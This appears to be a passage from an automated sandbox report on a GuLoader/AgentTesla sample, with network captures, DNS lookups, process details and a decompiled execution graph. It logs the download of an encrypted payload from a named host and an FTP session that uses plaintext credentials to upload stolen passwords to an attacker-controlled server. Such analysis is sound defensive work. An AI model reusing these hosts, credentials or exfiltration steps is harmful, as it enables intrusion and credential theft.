                                                              Dec 9, 2024 11:51:18.910857916 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.910902023 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.911068916 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.911159992 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.912257910 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.912302971 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.912379980 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.912420988 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.913764954 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.913826942 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.913985014 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.914041042 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.915241957 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.915389061 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.915433884 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.916670084 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.916716099 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.916744947 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.916812897 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:18.918098927 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:51:18.918143034 CET4970780192.168.2.5185.33.55.26
                                                              Dec 9, 2024 11:51:21.301223993 CET4972021192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:21.420569897 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:21.420710087 CET4972021192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:22.664783955 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:22.665045977 CET4972021192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:22.784512997 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:23.092427969 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:23.092602015 CET4972021192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:23.212686062 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:23.570451021 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:23.570630074 CET4972021192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:23.691327095 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:23.999263048 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:24.004677057 CET4972021192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:24.124182940 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:24.432157993 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:24.432373047 CET4972021192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:24.551774979 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:24.859484911 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:24.859752893 CET4972021192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:24.978977919 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:25.287765026 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:25.289056063 CET4972835590192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:25.336118937 CET4972021192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:25.409399986 CET355904972886.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:25.410464048 CET4972835590192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:25.411751986 CET4972021192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:25.531007051 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:26.587157011 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:26.587377071 CET4972835590192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:26.587445021 CET4972835590192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:26.633008003 CET4972021192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:26.707443953 CET355904972886.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:26.708287001 CET355904972886.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:26.708390951 CET4972835590192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:51:27.015438080 CET214972086.107.36.93192.168.2.5
                                                              Dec 9, 2024 11:51:27.054768085 CET4972021192.168.2.586.107.36.93
                                                              Dec 9, 2024 11:52:23.333213091 CET8049707185.33.55.26192.168.2.5
                                                              Dec 9, 2024 11:52:23.333462000 CET4970780192.168.2.5185.33.55.26
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 9, 2024 11:51:16.094882011 CET6264353192.168.2.51.1.1.1
                                                              Dec 9, 2024 11:51:16.693027020 CET53626431.1.1.1192.168.2.5
                                                              Dec 9, 2024 11:51:20.670809031 CET5268853192.168.2.51.1.1.1
                                                              Dec 9, 2024 11:51:21.297389984 CET53526881.1.1.1192.168.2.5
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 9, 2024 11:51:16.094882011 CET192.168.2.51.1.1.10x1accStandard query (0)akonnyuszerkezet.huA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 11:51:20.670809031 CET192.168.2.51.1.1.10x6be4Standard query (0)ftp.carbognin.itA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 9, 2024 11:51:16.693027020 CET1.1.1.1192.168.2.50x1accNo error (0)akonnyuszerkezet.hu185.33.55.26A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 11:51:21.297389984 CET1.1.1.1192.168.2.50x6be4No error (0)ftp.carbognin.it86.107.36.93A (IP address)IN (0x0001)false
                                                              • akonnyuszerkezet.hu
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549707185.33.55.26804956C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 11:51:16.825259924 CET206OUTGET /image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: akonnyuszerkezet.hu
                                                              Cache-Control: no-cache
                                                              Dec 9, 2024 11:51:18.116560936 CET1236INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Mon, 09 Dec 2024 10:51:17 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 241728
                                                              Connection: keep-alive
                                                              Last-Modified: Mon, 02 Dec 2024 06:34:18 GMT
                                                              ETag: "d220021-3b040-62843bcf7b24f"
                                                              Accept-Ranges: bytes
                                                              Data Raw: d3 e4 54 bc b3 47 a6 c2 a4 52 10 05 05 9c fb e6 04 60 5e a0 44 7a 89 4c 61 8a e9 3f 8a 98 ea 61 4d 0b 9f 45 f3 80 ab ea 10 dc 32 f7 5d 9a fd c7 94 a8 c2 54 78 e9 c7 9e f4 a7 20 24 a4 d1 ed fd d5 e7 c3 58 44 be 55 78 c4 01 4b 30 08 80 0f 6c 57 ec 61 1f 71 1d 2d 0c 59 44 02 33 2a d2 6c f8 de f5 e2 f7 4a 61 93 61 2e f4 d6 22 3c e5 44 5e b7 ba 3c e9 db 9c a2 76 38 32 ca 9a 89 32 eb 4e d1 50 5f 33 96 a4 df 5a d3 76 89 c2 42 cb 0e 47 bf 84 af ff 55 77 c9 4e ac 44 02 0b f2 d7 58 7e e6 e0 f9 fa 76 1c c6 97 1c 47 5d 1e b5 55 87 4a 74 86 75 e6 83 33 0b f8 bd 66 e6 fb 98 50 ee 9b 63 a5 17 cd 61 ec 37 7a 6b c1 20 98 a1 05 40 92 3c ab 4d fa 37 0d 6a 15 e7 12 9f 6e ce 04 60 02 a2 ac 60 68 3d 5f 0e c9 2e 69 f1 31 08 86 76 58 88 7e 5e 3c df ad ff 49 97 8f 06 49 5e 2e 10 f7 4e 75 9e 7c 48 40 cd 9b 7f 54 46 20 bf a3 29 65 69 9c a8 a2 1a 46 ca b4 64 f2 31 f1 ec b4 32 26 ed 6e 0c 4a b7 d0 a1 bc bc 96 7c d5 96 55 bc 06 49 87 a7 bf a9 52 68 5a e7 52 20 93 3e ed a2 7c 26 cf 0e 82 be 1b 68 67 d4 85 a3 5a c0 ed ce 42 ed 04 [TRUNCATED]
                                                              Data Ascii: TGR`^DzLa?aME2]Tx $XDUxK0lWaq-YD3*lJaa."<D^<v822NP_3ZvBGUwNDX~vG]UJtu3fPca7zk @<M7jn``h=_.i1vX~^<II^.Nu|H@TF )eiFd12&nJ|UIRhZR >|&hgZB{u*[{w8973(kvS$gzqWcq rxd|j.f-d+yScqloomPQ/ec=so@-IMOwHm}S:Z>M/WL6mcrRLckJ^#RP?#G[CRV-FJ/A;Y]P4K piQ|$s>,Pp 3f-!oR~GfV=!/(S:}a/:m=n7"'|eadE'[Y*>+pa,%Gg-b:c|_77/5r!d(D1O&1p6D1tJnMA5|.VG_o[=:(Y*1"9.mi \>+:|jetXf2.8%|cBi#hV1g
                                                              Dec 9, 2024 11:51:18.116574049 CET488INData Raw: 43 b7 70 d0 82 22 f7 55 07 64 d6 62 83 98 b5 d2 fb 46 f2 0c e8 8d b7 65 d6 30 45 32 f6 e7 9f d7 9a 44 95 72 b5 d2 11 77 c3 64 e0 2e b0 3e 61 01 af 59 74 86 91 11 bc f1 6e cf 02 10 82 fc 98 ee d6 b2 31 af d8 ac 88 b5 2e 3d f8 e3 6c 27 bd f2 87 ad
                                                              Data Ascii: Cp"UdbFe0E2Drwd.>aYtn1.=l'p0Hic|85}o@^$a]FlRn9z5#u!1O+>]y2eG"}uv VQxMl~1O*X1=sB<qoY)D
                                                              Dec 9, 2024 11:51:18.116704941 CET1236INData Raw: 0a 12 31 a1 8f 82 9d 4c 5d 96 e8 19 79 da 15 dd 0f bd fd c1 8a 94 8b c6 88 98 a9 3a 60 a0 3e e4 e5 f5 2f 12 f7 5e 24 d9 5e fa 60 f8 89 e4 3c b4 f4 d9 b9 66 2b 13 66 8f 66 11 e6 e4 66 54 70 83 62 cb 60 2d 87 1c 92 0a 5a 8f e9 80 22 57 94 31 dd 1d
                                                              Data Ascii: 1L]y:`>/^$^`<f+fffTpb`-Z"W1j5j,Y*:n$q09K@\id{P!)u!RS";GvK:=_0dQ*>ecz bR=kR_=YP}[}_kq
                                                              Dec 9, 2024 11:51:18.116715908 CET1236INData Raw: 98 09 46 6c 56 32 bc c9 20 f4 47 2d c3 19 79 19 e7 9d 67 72 b2 59 b5 56 45 7d e6 5b 29 2b 85 a2 30 da aa 2b 39 56 e9 b2 42 e2 2d 1c 28 e4 01 48 b4 41 63 08 8b 42 fb 2b aa 2b 24 f3 54 2f 7d d0 1a 26 a5 bb 9d 2f 9d 24 2e 97 20 b3 60 d0 1d 5f 33 81
                                                              Data Ascii: FlV2 G-ygrYVE}[)+0+9VB-(HAcB++$T/}&/$. `_3p`cQE:)#FV#@GZ_*{md7Ps5|eRqr3-`q)1txoc"y ][K
                                                              Dec 9, 2024 11:51:18.116890907 CET1236INData Raw: c6 b2 04 fa 78 9d b3 8d 70 57 da 30 f2 df bd d9 9b bf ec 49 7b 36 80 f9 05 5a 2d d6 78 93 4e 0a 68 b2 2c ca a8 b3 13 88 cc 1a c1 66 a6 2f 68 a8 0d a6 31 c2 b1 d0 b6 86 d0 25 62 08 ec 9b 15 c3 3c 54 72 f5 6a fe df 5c 6c 88 01 26 35 7a d1 a5 7a e9
                                                              Data Ascii: xpW0I{6Z-xNh,f/h1%b<Trj\l&5zz-g+c7CYq;I<>-HB+Q<Y?KWf4"~#0L9{mm2JV;E[EzV+Xu%H,@{T;]i@#Q3|
                                                              Dec 9, 2024 11:51:18.116982937 CET672INData Raw: 53 8d 9d ee 34 ba 79 8f 09 33 24 3b 35 26 07 76 68 92 23 3b 9f 3e 95 41 8d d7 b3 f0 64 11 43 8f 13 55 96 06 07 a6 d0 96 35 a4 16 76 60 05 70 33 30 c6 00 f1 4d 1d ff 55 bf 61 ba 23 bd 22 87 19 92 08 f3 96 b2 a1 c4 6c 07 df 6d a3 37 59 35 46 81 d3
                                                              Data Ascii: S4y3$;5&vh#;>AdCU5v`p30MUa#"lm7Y5FUqJn%Kj&1^AC3Pv2oWM+m)%7bf+4D$5"R#`F1iI8_vZ*e1N8.-sJ>fU>FXGKl
                                                              Dec 9, 2024 11:51:18.116992950 CET1236INData Raw: 56 d3 4c d3 2d 5d 99 23 8d 97 b9 5c eb b4 8b 69 11 4c 94 c9 9a fe 1f 64 82 b2 a0 b3 1e 16 fe b4 fc 27 52 df b2 50 3f e0 ee e7 1a 55 5b 43 8e 89 34 ee a6 50 d3 fa 46 db 2e f0 fa 0a ea 51 09 4d 2f e9 e2 de 7c aa bf ca be 92 c4 f7 ad 02 4b c9 1a 96
                                                              Data Ascii: VL-]#\iLd'RP?U[C4PF.QM/|K.H93gQ|i*+s4x"ppp4f"cZ'L/Akn<0.n:<]enijM@CAe8c6:G"K}wjS9
                                                              Dec 9, 2024 11:51:18.117017031 CET1236INData Raw: 2a 55 f9 8b aa 8c 1b 81 c4 e9 98 3a 14 ba 25 0c ca 41 2c c8 d7 6f 33 ac b1 f0 fd fb 5c 79 b8 d9 aa 31 93 ba 5f ff ca 48 1c 8f 0e b7 c6 f6 c0 ab 3a 7c b4 5f b1 6c fa 14 df 4f d9 0d 8c 86 20 a4 d6 29 65 43 13 bc 4d 70 4e 3d 34 93 2e d5 b9 f7 8c b4
                                                              Data Ascii: *U:%A,o3\y1_H:|_lO )eCMpN=4.dOLepxAUx>H0obq n3*,`Jaw.2D<%JOZ/<3%"h7Vj4<.C`,P07-4=m
                                                              Dec 9, 2024 11:51:18.117029905 CET1236INData Raw: 01 d3 dc 45 fa ec 44 81 15 19 bf 80 34 52 b9 ca c4 e4 d2 06 bb 17 45 10 48 cb 2d 86 99 83 4e c7 10 6f bc 2b 58 47 e5 ce 90 5d 43 72 41 2e 52 20 9c 1c b5 47 a6 36 7a 6d ca 2c a3 3f 14 86 4b 9b be 83 e4 79 86 22 f2 96 91 8d 04 f5 a8 70 c6 88 d8 db
                                                              Data Ascii: ED4REH-No+XG]CrA.R G6zm,?Ky"p1=vz`+|:LD3=k{'tlEkN4S^rLm]nQ_ey1"\yVS~A%Pw3y4paEwIWhzc$t[)|)Fy42
                                                              Dec 9, 2024 11:51:18.117041111 CET1236INData Raw: ef 23 5d cf 0d c3 30 e3 8b 09 01 9c af e4 6c 91 72 d4 29 d3 6e a5 9e b5 3e ad d3 eb e8 e9 6e ed 17 93 af 35 8c 9f 54 14 23 f3 ba 1c 1f 4d 44 31 b3 08 12 e0 67 3c 4f c9 61 47 6d 6f d5 b1 ce 6f 31 3a 47 de b6 ef 7a cb 07 02 d4 04 97 8f fd 4a c3 95
                                                              Data Ascii: #]0lr)n>n5T#MD1g<OaGmoo1:GzJf;Un{'V++yS?YdVaM*raeEg~*BD$ag:XyxEGt||c([o[,Z(*A=S]
                                                              Dec 9, 2024 11:51:18.236637115 CET1236INData Raw: f2 2f 0b 32 eb 6e c7 4f e5 3d 68 1e da 97 f2 30 84 82 8f ca 4e 2f d6 f7 71 8e 1e 03 ae 3c cd d7 2e 6c 93 91 7c 11 92 ca 17 d8 56 6e b2 07 32 2e 33 1e e4 1a d4 6a e7 e7 1d 83 ad c0 0a fe 99 46 ec fb 98 50 10 9a 0a ee 17 cd 2d d5 5e 78 9a 31 e6 f6
                                                              Data Ascii: /2nO=h0N/q<.l|Vn2.3jFP-^x1@l2M)dn\b;`hS1*>X2DP y|hK{G)e2n~tn<FBlhIiicR |WhgYBu*w#g84";3C


                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                              Dec 9, 2024 11:51:22.664783955 CET214972086.107.36.93192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.
                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.
                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login
                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                              Dec 9, 2024 11:51:22.665045977 CET4972021192.168.2.586.107.36.93USER server@carbognin.it
                                                              Dec 9, 2024 11:51:23.092427969 CET214972086.107.36.93192.168.2.5331 User server@carbognin.it OK. Password required
                                                              Dec 9, 2024 11:51:23.092602015 CET4972021192.168.2.586.107.36.93PASS 59Cif8wZUH#X
                                                              Dec 9, 2024 11:51:23.570451021 CET214972086.107.36.93192.168.2.5230 OK. Current restricted directory is /
                                                              Dec 9, 2024 11:51:23.999263048 CET214972086.107.36.93192.168.2.5504 Unknown command
                                                              Dec 9, 2024 11:51:24.004677057 CET4972021192.168.2.586.107.36.93PWD
                                                              Dec 9, 2024 11:51:24.432157993 CET214972086.107.36.93192.168.2.5257 "/" is your current location
                                                              Dec 9, 2024 11:51:24.432373047 CET4972021192.168.2.586.107.36.93TYPE I
                                                              Dec 9, 2024 11:51:24.859484911 CET214972086.107.36.93192.168.2.5200 TYPE is now 8-bit binary
                                                              Dec 9, 2024 11:51:24.859752893 CET4972021192.168.2.586.107.36.93PASV
                                                              Dec 9, 2024 11:51:25.287765026 CET214972086.107.36.93192.168.2.5227 Entering Passive Mode (86,107,36,93,139,6)
                                                              Dec 9, 2024 11:51:25.411751986 CET4972021192.168.2.586.107.36.93STOR PW_user-114127_2024_12_09_05_51_19.html
                                                              Dec 9, 2024 11:51:26.587157011 CET214972086.107.36.93192.168.2.5150 Accepted data connection
                                                              Dec 9, 2024 11:51:27.015438080 CET214972086.107.36.93192.168.2.5226-File successfully transferred
                                                              226-File successfully transferred226 0.428 seconds (measured here), 0.73 Kbytes per second

                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:05:50:54
                                                              Start date:09/12/2024
                                                              Path:C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"
                                                              Imagebase:0x400000
                                                              File size:1'002'622 bytes
                                                              MD5 hash:FF83F495808F8837A41405726CE9D7B9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.2171267771.000000000074C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2172384343.000000000323D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:05:51:09
                                                              Start date:09/12/2024
                                                              Path:C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"
                                                              Imagebase:0x400000
                                                              File size:1'002'622 bytes
                                                              MD5 hash:FF83F495808F8837A41405726CE9D7B9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3278956920.00000000017CD000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:false

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:20.5%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:15.9%
                                                                Total number of Nodes:1620
                                                                Total number of Limit Nodes:51
                                                                execution_graph 4238 403640 SetErrorMode GetVersionExW 4239 403692 GetVersionExW 4238->4239 4240 4036ca 4238->4240 4239->4240 4241 403723 4240->4241 4242 406a35 5 API calls 4240->4242 4329 4069c5 GetSystemDirectoryW 4241->4329 4242->4241 4244 403739 lstrlenA 4244->4241 4245 403749 4244->4245 4332 406a35 GetModuleHandleA 4245->4332 4248 406a35 5 API calls 4249 403757 4248->4249 4250 406a35 5 API calls 4249->4250 4251 403763 #17 OleInitialize SHGetFileInfoW 4250->4251 4338 406668 lstrcpynW 4251->4338 4254 4037b0 GetCommandLineW 4339 406668 lstrcpynW 4254->4339 4256 4037c2 4340 405f64 4256->4340 4259 4038f7 4260 40390b GetTempPathW 4259->4260 4344 40360f 4260->4344 4262 403923 4264 403927 GetWindowsDirectoryW lstrcatW 4262->4264 4265 40397d DeleteFileW 4262->4265 4263 405f64 CharNextW 4267 4037f9 4263->4267 4268 40360f 12 API calls 4264->4268 4354 4030d0 GetTickCount GetModuleFileNameW 4265->4354 4267->4259 4267->4263 4272 4038f9 4267->4272 4270 403943 4268->4270 4269 403990 4273 403a54 4269->4273 4275 403a45 4269->4275 4279 405f64 CharNextW 4269->4279 4270->4265 4271 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4270->4271 4274 40360f 12 API calls 4271->4274 4440 406668 lstrcpynW 4272->4440 4494 403c25 4273->4494 4278 403975 4274->4278 4384 403d17 4275->4384 4278->4265 4278->4273 4296 4039b2 4279->4296 4282 403b91 4285 403b99 GetCurrentProcess OpenProcessToken 4282->4285 4286 403c0f ExitProcess 4282->4286 4283 403b7c 4503 405cc8 4283->4503 4290 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 4285->4290 4291 403bdf 4285->4291 4287 403a1b 4441 40603f 4287->4441 4288 403a5c 4457 405c33 4288->4457 4290->4291 4294 406a35 5 API calls 4291->4294 4298 403be6 4294->4298 4296->4287 4296->4288 4300 403bfb ExitWindowsEx 4298->4300 4305 403c08 4298->4305 4300->4286 4300->4305 4301 403a72 lstrcatW 4302 403a7d lstrcatW lstrcmpiW 4301->4302 4302->4273 4303 403a9d 4302->4303 4306 403aa2 4303->4306 4307 403aa9 4303->4307 4507 40140b 4305->4507 4460 405b99 CreateDirectoryW 4306->4460 4465 405c16 CreateDirectoryW 4307->4465 4308 403a3a 4456 406668 lstrcpynW 4308->4456 4314 403aae SetCurrentDirectoryW 4315 403ac0 4314->4315 4316 403acb 4314->4316 4468 406668 lstrcpynW 4315->4468 4469 406668 lstrcpynW 4316->4469 4321 403b19 CopyFileW 4326 403ad8 4321->4326 4322 403b63 4324 406428 36 API calls 4322->4324 4324->4273 4325 4066a5 17 API calls 4325->4326 4326->4322 4326->4325 4328 403b4d CloseHandle 4326->4328 4470 4066a5 4326->4470 4487 406428 MoveFileExW 4326->4487 4491 405c4b CreateProcessW 4326->4491 4328->4326 4330 4069e7 wsprintfW LoadLibraryExW 4329->4330 4330->4244 4333 406a51 4332->4333 4334 406a5b GetProcAddress 4332->4334 4335 4069c5 3 API calls 4333->4335 4336 403750 4334->4336 4337 406a57 4335->4337 4336->4248 4337->4334 4337->4336 4338->4254 4339->4256 4341 405f6a 4340->4341 4342 4037e8 CharNextW 4341->4342 4343 405f71 CharNextW 4341->4343 4342->4267 4343->4341 4510 4068ef 4344->4510 4346 403625 4346->4262 4347 40361b 4347->4346 4519 405f37 lstrlenW CharPrevW 4347->4519 4350 405c16 2 API calls 4351 403633 4350->4351 4522 406187 4351->4522 4526 406158 GetFileAttributesW CreateFileW 4354->4526 4356 403113 4383 403120 4356->4383 4527 406668 lstrcpynW 4356->4527 4358 403136 4528 405f83 lstrlenW 4358->4528 4362 403147 GetFileSize 4363 40315e 4362->4363 4378 403241 4362->4378 4369 4032de 4363->4369 4376 40302e 32 API calls 4363->4376 4363->4378 4363->4383 4564 4035e2 4363->4564 4367 403286 GlobalAlloc 4370 40329d 4367->4370 4372 40302e 32 API calls 4369->4372 4374 406187 2 API calls 4370->4374 4371 403267 4373 4035e2 ReadFile 4371->4373 4372->4383 4375 403272 4373->4375 4377 4032ae CreateFileW 4374->4377 4375->4367 4375->4383 4376->4363 4379 4032e8 4377->4379 4377->4383 4533 40302e 4378->4533 4548 4035f8 SetFilePointer 4379->4548 4381 4032f6 4549 403371 4381->4549 4383->4269 4385 406a35 5 API calls 4384->4385 4386 403d2b 4385->4386 4387 403d31 4386->4387 4388 403d43 4386->4388 4619 4065af wsprintfW 4387->4619 4620 406536 4388->4620 4391 403d92 lstrcatW 4394 403d41 4391->4394 4393 406536 3 API calls 4393->4391 4611 403fed 4394->4611 4397 40603f 18 API calls 4398 403dc4 4397->4398 4399 403e58 4398->4399 4401 406536 3 API calls 4398->4401 4400 40603f 18 API calls 4399->4400 4402 403e5e 4400->4402 4404 403df6 4401->4404 4403 403e6e LoadImageW 4402->4403 4405 4066a5 17 API calls 4402->4405 4406 403f14 4403->4406 4407 403e95 RegisterClassW 4403->4407 4404->4399 4408 403e17 lstrlenW 4404->4408 4411 405f64 CharNextW 4404->4411 4405->4403 4410 40140b 2 API calls 4406->4410 4409 403ecb SystemParametersInfoW CreateWindowExW 4407->4409 4439 403f1e 4407->4439 4412 403e25 lstrcmpiW 4408->4412 4413 403e4b 4408->4413 4409->4406 4414 403f1a 4410->4414 4415 403e14 4411->4415 4412->4413 4416 403e35 GetFileAttributesW 4412->4416 4417 405f37 3 API calls 4413->4417 4419 403fed 18 API calls 4414->4419 4414->4439 4415->4408 4418 403e41 4416->4418 4420 403e51 4417->4420 4418->4413 4421 405f83 2 API calls 4418->4421 4422 403f2b 4419->4422 4625 406668 lstrcpynW 4420->4625 4421->4413 4424 403f37 ShowWindow 4422->4424 4425 403fba 4422->4425 4427 4069c5 3 API calls 4424->4427 4626 40579d OleInitialize 4425->4626 4429 403f4f 4427->4429 4428 403fc0 4430 403fc4 4428->4430 4431 403fdc 4428->4431 4432 403f5d GetClassInfoW 4429->4432 4434 4069c5 3 API calls 4429->4434 4438 40140b 2 API calls 4430->4438 4430->4439 4433 40140b 2 API calls 4431->4433 4435 403f71 GetClassInfoW RegisterClassW 4432->4435 4436 403f87 DialogBoxParamW 4432->4436 4433->4439 4434->4432 4435->4436 4437 40140b 2 API calls 4436->4437 4437->4439 4438->4439 4439->4273 4440->4260 4648 406668 lstrcpynW 4441->4648 4443 406050 4649 405fe2 CharNextW CharNextW 4443->4649 4446 403a27 4446->4273 4455 406668 lstrcpynW 4446->4455 4447 4068ef 5 API calls 4453 406066 4447->4453 4448 406097 lstrlenW 4449 4060a2 4448->4449 4448->4453 4451 405f37 3 API calls 4449->4451 4452 4060a7 GetFileAttributesW 4451->4452 4452->4446 4453->4446 4453->4448 4454 405f83 2 API calls 4453->4454 4655 40699e FindFirstFileW 4453->4655 4454->4448 4455->4308 4456->4275 4458 406a35 5 API calls 4457->4458 4459 403a61 lstrcatW 4458->4459 4459->4301 4459->4302 4461 403aa7 4460->4461 4462 405bea GetLastError 4460->4462 4461->4314 4462->4461 4463 405bf9 SetFileSecurityW 4462->4463 4463->4461 4464 405c0f GetLastError 4463->4464 4464->4461 4466 405c26 4465->4466 4467 405c2a GetLastError 4465->4467 4466->4314 4467->4466 4468->4316 4469->4326 4472 4066b2 4470->4472 4471 4068d5 4473 403b0d DeleteFileW 4471->4473 4660 406668 lstrcpynW 4471->4660 4472->4471 4475 4068a3 lstrlenW 4472->4475 4476 4067ba GetSystemDirectoryW 4472->4476 4479 406536 3 API calls 4472->4479 4480 4066a5 10 API calls 4472->4480 4481 4067cd GetWindowsDirectoryW 4472->4481 4482 4067fc SHGetSpecialFolderLocation 4472->4482 4483 406844 lstrcatW 4472->4483 4484 4066a5 10 API calls 4472->4484 4485 4068ef 5 API calls 4472->4485 4658 4065af wsprintfW 4472->4658 4659 406668 lstrcpynW 4472->4659 4473->4321 4473->4326 4475->4472 4476->4472 4479->4472 4480->4475 4481->4472 4482->4472 4486 406814 SHGetPathFromIDListW CoTaskMemFree 4482->4486 4483->4472 4484->4472 4485->4472 